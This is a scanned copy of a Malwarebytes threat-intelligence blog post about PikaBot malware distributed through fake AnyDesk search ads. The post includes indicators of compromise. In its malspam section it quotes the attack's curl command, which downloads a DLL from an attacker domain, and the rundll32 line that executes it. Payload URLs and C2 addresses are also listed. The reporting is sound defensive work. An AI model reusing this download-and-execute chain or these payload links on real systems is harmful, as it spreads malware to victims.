www.malwarebytes.com
Open in
urlscan Pro
192.0.66.233
Public Scan
URL:
https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads
Submission: On January 04 via api from DE — Scanned from DE
Submission: On January 04 via api from DE — Scanned from DE
Form analysis 4 forms found in the DOM
GET https://www.malwarebytes.com/
<form role="search" method="get" class="search-form" action="https://www.malwarebytes.com/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Type to search..." value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>GET https://www.malwarebytes.com/
<form role="search" method="get" class="search-form" action="https://www.malwarebytes.com/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Type to search..." value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>GET https://www.malwarebytes.com/blog/
<form role="search" method="get" class="search-form" action="https://www.malwarebytes.com/blog/">
<div class="labs-sub-nav__searchbar-wrap">
<input class="labs-sub-nav__search-input" type="text" name="s" placeholder="Search Labs">
<button class="labs-sub-nav__search-button" id="cta-labs-rightrail-search-submit-en" aria-label="Search in Malwarebytes">
<svg xmlns="http://www.w3.org/2000/svg" width="35px" height="35px" viewBox="0 0 24 24" fill="none">
<g clip-path="url(#clip0_15_152)">
<rect width="24" height="24" fill="none"></rect>
<circle cx="10.5" cy="10.5" r="6.5" stroke="#0d3ecc" stroke-linejoin="round"></circle>
<path d="M19.6464 20.3536C19.8417 20.5488 20.1583 20.5488 20.3536 20.3536C20.5488 20.1583 20.5488 19.8417 20.3536 19.6464L19.6464 20.3536ZM20.3536 19.6464L15.3536 14.6464L14.6464 15.3536L19.6464 20.3536L20.3536 19.6464Z" fill="#0d3ecc">
</path>
</g>
<defs>
<clipPath id="clip0_15_152">
<rect width="24" height="24" fill="#0d3ecc"></rect>
</clipPath>
</defs>
</svg>
</button>
</div>
</form>https://www.malwarebytes.com/newsletter/
<form action="https://www.malwarebytes.com/newsletter/" class="newsletter-form">
<div class="newsletter-form__inline">
<label>Email Address</label>
<input type="email" name="email" id="cta-footer-newsletter-input-email-en" placeholder="Email Address" required="" class="newsletter-form__email">
<input type="hidden" class="newsletter-form__pageurl" value="https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads">
<input name="source" type="hidden" value="">
<input type="submit" value="Sign Up" class="newsletter-form__btn" id="cta-footer-newsletter-subscribe-email-en">
</div>
<div class="newsletter-form__validate hidden">
<span></span>
</div>
</form>Text Content
Skip to content
Search
Search Malwarebytes.com
Search for:
* Contact Us
* Personal Support
* Business Support
* Talk to Sales
* Contact Press
* Partner Programs
* Submit Vulnerability
* Company
* About Malwarebytes
* Careers
* News & Press
* Sign In
* MyAccount sign in: manage your personal or Teams subscription >
* Cloud Console sign in: manage your cloud business products >
* Partner Portal sign in: management for Resellers and MSPs >
* Personal
< Personal
Products
* Malwarebytes Premium >
* Malwarebytes Privacy VPN >
* Malwarebytes Identity Theft Protection >
* Malwarebytes Browser Guard >
* Malwarebytes for Teams/small offices >
* AdwCleaner for Windows >
--------------------------------------------------------------------------------
Find the right product
See our plans
Infected already?
Clean your device now
Solutions
* Free antivirus >
* Free virus scan & removal >
* Windows antivirus >
* Mac antivirus >
* Android antivirus >
* iOS security >
* Chromebook antivirus >
See personal pricing
Manage your subscription
Visit our support page
* Business
< Business
BUNDLES
* Core
* Prevent and remediate threats and identify vulnerabilities
* Advanced
* Utilize threat guidance and patch management plus everything in Core
* Elite
* Deploy Managed Detection and Response plus everything in Advanced
* Ultimate
* Protect against categories of malicious websites plus everything in Elite
TECHNOLOGY HIGHLIGHTS
* Managed Detection & Response (MDR)
* Deploy fully-managed threat monitoring, investigation, and remediation
* Endpoint Detection & Response (EDR)
* Prevent more attacks with security that catches what others miss
* Security Advisor
* Visualize and optimize your security posture in just minutes
* For Education
* Secure your students and institution against cyberattacks
Learn more about Security Advisor (available in every bundle) and see the
full list of our products and services.
Full technology list >
* Pricing
< Pricing
Personal pricing
Protect your personal devices and data
Small office/home office pricing
Protect your team’s devices and data
Business pricing
Explore our award-winning endpoint security products, from EP to EDR to MDR
* Partners
< Partners
Explore Partnerships
Partner Solutions
* Resellers
* Managed Service Providers
* Computer Repair
* Technology Partners
* Affiliate Partners
Contact Us
* Resources
< Resources
Learn About Cybersecurity
* Antivirus
* Malware
* Ransomware
Malwarebytes Labs – Blog
* Glossary
* Threat Center
Business Resources
* Reviews
* Analyst Reports
* Case Studies
Press & News
Reports
The State of Malware 2023 Report
Read report
* Support
< Support
Technical Support
* Personal Support
* Business Support
* Premium Services
* Forums
* Vulnerability Disclosure
* Report a False Positive
Featured Content
* Activate Malwarebytes Privacy on Windows device.
See Content
Product Videos
Free Download
* Contact Us
* < Contact Us
* Personal Support
* Business Support
* Talk to Sales
* Contact Press
* Partner Programs
* Submit Vulnerability
* Company
* < Company
* About Malwarebytes
* Careers
* News & Press
* Sign In
* < Sign In
* MyAccount sign in: manage your personal or Teams subscription >
* Cloud Console sign in: manage your cloud business products >
* Partner Portal sign in: management for Resellers and MSPs >
Search Search
Search Malwarebytes.com
Search for:
SUBSCRIBE rss
Threat Intelligence
PIKABOT DISTRIBUTED VIA MALICIOUS SEARCH ADS
Posted: December 15, 2023 by Jérôme Segura
During this past year, we have seen an increase in the use of malicious ads
(malvertising) and specifically those via search engines, to drop malware
targeting businesses. In fact, browser-based attacks overall have been a lot
more common if we include social engineering campaigns.
Criminals have found success in acquiring new victims thanks to search ads; we
believe there are specialized services that help malware distributors and
affiliates to bypass Google’s security measures and helping them to set up a
decoy infrastructure. In particular, we saw similarities with the malvertising
chains previously used to drop FakeBat.
In the past few days, researchers including ourselves have observed PikaBot, a
new malware family that appeared in early 2023, distributed via malvertising.
PikaBot was previously only distributed via malspam campaigns similarly to
QakBot and emerged as one of the preferred payloads for a threat actor known as
TA577.
In this blog post, we share details about this new campaign along with
indicators of compromise.
PIKABOT VIA MALSPAM
PikaBot was first identified as a possible Matanbuchus drop from a malspam
campaign by Unit 42 in February 2023. The name PikaBot was later given and
attributed to TA577, a threat actor that Proofpoint saw involved in the
distribution of payloads such as QakBot, IcedID, SystemBC as well as Cobalt
Strike. More importantly, TA577 has been associated with ransomware
distribution.
Researchers at Cofense observed a rise in malspam campaigns to deliver both
DarkGate and PikaBot, following the takedown of the QakBot botnet in August
2023. A typical distribution chain for PikaBot usually starts with an email
(hijacked thread) containing a link to an external website. Users are tricked to
download a zip archive containing a malicious JavaScript.
The JavaScript creates a random directory structure where it retrieves the
malicious payload from an external website via the curl utility:
"C:\Windows\System32\cmd.exe" /c mkdir C:\Gkooegsglitrg\Dkrogirbksri & curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll
curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll
It then executes the paylod (DLL) via rundll32:
rundll32 C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll,Enter
As described by OALabs, PikaBot’s core module is then injected into the
legitimate SearchProtocolHost.exe process. PikaBot’s loader also hides its
injection by using indirect syscalls, making the malware very stealthy.
DISTRIBUTION VIA MALVERTISING
The campaign targets Google searches for the remote application AnyDesk.
Security researcher Colin Cowie observed the distribution chain and the payload
was later confirmed to be PikaBot by Ole Villadsen.
We also saw this campaign via a different ad impersonating the AnyDesk brand,
belonging to the fake persona “Manca Marina”:
A decoy website has been setup at anadesky[.]ovmv[.]net:
The download is a digitally signed MSI installer. It’s worth noting that it had
zero detection on VirusTotal at the time we collected it. However, the more
interesting aspect is how it evades detection upon execution.
The diagram below from JoeSandbox summarizes the execution flow:
MALVERTISING SIMILARITIES WITH FAKEBAT
The threat actors are bypassing Google’s security checks with a tracking URL via
a legitimate marketing platform to redirect to their custom domain behind
Cloudflare. At this point, only clean IP addresses are forwarded to the next
step.
They perform fingerprinting via JavaScript to determine, among other things, if
the user is running a virtual machine. Only after the check is successful do we
see a redirect to the main landing page (decoy AnyDesk site).
What’s interesting is that there is a second fingerprinting attempt when the
user clicks the download button. This is likely to ensure that the download link
won’t work in a virtualized environment. In this particular campaign, the threat
actor is hosting the MSI installer on Dropbox.
We noticed that previous malvertising chains used the same redirection mechanism
via onelink[.]me as well as URL structure. These incidents were previously
reported to Google and targeted Zoom and Slack search ads:
In some of these instances, we had identified the payload as FakeBat. This is
particularly interesting because it points towards a common process used by
different threat actors. Perhaps, this is something akin to “malvertising as a
service” where Google ads and decoy pages are provided to malware distributors.
CONCLUSION
Several years ago, exploit kits were the primary malware distribution vector via
drive-by downloads. As vulnerabilities in the browser and its plugins began to
be less effective, threat actors concentrated on spam to target businesses.
However, some did continue to target browsers but instead had to rely on social
engineering, luring victims with fake browser updates.
With malvertising, we see another powerful delivery vector that does not require
the user to visit a compromised site. Instead, threat actors are piggybacking on
search engines and simply buyings ads that they know their target will be
exposed to. As we may have said before, businesses can prevent this risk by only
allowing their end users to install applications via their own trusted
repositories.
Malwarebytes detects the malicious MSI installers as well as the web
infrastructure used in these malvertising campaigns. We have reported the
malicious ads and download URLs to Google and Dropbox respectively.
Special thanks to Sergei Frankoff, Ole Villadsen, and pr0xylife for their help
and feedback.
INDICATORS OF COMPROMISE
Malicious domains
anadesky[.]ovmv[.]net
cxtensones[.]top
Dropbox payloads
dropbox[.]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq
dropbox[.]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu
dropbox[.]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1&rlkey=qbtes3fd3v3vtlzuz8ql9t3qj
PikaBot hashes
0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5
da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff
69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320
PikaBot C2s
172[.]232[.]186[.]251
57[.]128[.]83[.]129
57[.]128[.]164[.]11
57[.]128[.]108[.]132
139[.]99[.]222[.]29
172[.]232[.]164[.]77
54[.]37[.]79[.]82
172[.]232[.]162[.]198
57[.]128[.]109[.]221
SHARE THIS ARTICLE
RELATED ARTICLES
News | Ransomware
MICROSOFT DISABLES MS-APPINSTALLER AFTER MALICIOUS USE
January 3, 2024 - Microsoft decided to disable App Installer links by default
after it noticed several access brokers using the handler to spread malware.
CONTINUE READING 0 Comments
News | Personal | Scams
INVESTMENT FRAUD A SERIOUS MONEY MAKER FOR CRIMINALS
January 3, 2024 - Europols’s spotlight report ‘Online fraud schemes: a web of
deceit’, identifies investment fraud as a major threat.
CONTINUE READING 0 Comments
News | Ransomware
OOPS! BLACK BASTA RANSOMWARE FLUBS ENCRYPTION
January 2, 2024 - Researchers have found a flaw in the Black Basta ransomware
encryption algorithm, allowing decryption of some files.
CONTINUE READING 0 Comments
News
A WEEK IN SECURITY (DECEMBER 25 – DECEMBER 31)
January 1, 2024 - A list of topics we covered in the week of December 25 to
December 31 of 2023
CONTINUE READING 0 Comments
Business
THE TOP 4 RANSOMWARE GANG FAILURES OF 2023
December 29, 2023 - Ransomware gangs don't always win, and when they don't, it
feels pretty great.
CONTINUE READING 0 Comments
ABOUT THE AUTHOR
Jérôme Segura
A special interest for web threats.
Contributors
Threat Center
Podcast
Glossary
Scams
Cyberprotection for every one.
FOR PERSONAL
* Windows Antivirus
* Mac Antivirus
* Android Antivirus
* Free Antivirus
* VPN App (All Devices)
* Malwarebytes for iOS
* SEE ALL
COMPANY
* About Us
* Contact Us
* Careers
* News and Press
* Blog
* Scholarship
* Forums
FOR BUSINESS
* Small Businesses
* Mid-size business
* Larger Enterprise
* Endpoint Protection
* Endpoint Detection & Response
* Managed Detection and Response (MDR)
FOR PARTNERS
* Managed Service Provider (MSP) Program
* Resellers
MY ACCOUNT
Sign In
SOLUTIONS
* Rootkit Scanner
* Trojan Scanner
* Virus Scanner
* Spyware Scanner
* Password Generator
* Anti Ransomware Protection
ADDRESS
One Albert Quay
2nd Floor
Cork T12 X8N6
Ireland
3979 Freedom Circle
12th Floor
Santa Clara, CA 95054
LEARN
* Malware
* Hacking
* Phishing
* Ransomware
* Computer Virus
* Antivirus
* What is VPN?
* Twitter
* Facebook
* LinkedIn
* Youtube
* Instagram
CYBERSECURITY INFO YOU CAN’T LIVE WITHOUT
Want to stay informed on the latest news in cybersecurity? Sign up for our
newsletter and learn how to protect your computer from threats.
Email Address
English
* Legal
* Privacy
* Accessibility
* Vulnerability Disclosure
* Terms of Service
© 2024 All Rights Reserved
Select your language
* English
* Deutsch
* Español
* Français
* Italiano
* Português (Portugal)
* Português (Brasil)
* Nederlands
* Polski
* Pусский
* 日本語
* Svenska
This site uses cookies in order to enhance site navigation, analyze site usage
and marketing efforts. Please see our privacy policy for more information.
Privacy Policy
Cookies Settings Decline All Accept All Cookies
PRIVACY PREFERENCE CENTER
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
Privacy Policy
Allow All
MANAGE CONSENT PREFERENCES
STRICTLY NECESSARY
Always Active
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to
block or alert you about these cookies, but some parts of the site will not then
work. These cookies do not store any personally identifiable information.
Cookies Details
PERFORMANCE AND FUNCTIONALITY
Performance and Functionality
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then
some or all of these services may not function properly.
Cookies Details
ANALYTICS
Analytics
These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site. All
information these cookies collect is aggregated and therefore anonymous. If you
do not allow these cookies we will not know when you have visited our site, and
will not be able to monitor its performance.
Cookies Details
ADVERTISING
Advertising
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.
Cookies Details
Back Button
BACK
Search Icon
Filter Icon
Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label
*
View Cookies
* Name
cookie name
Decline All Confirm My Choices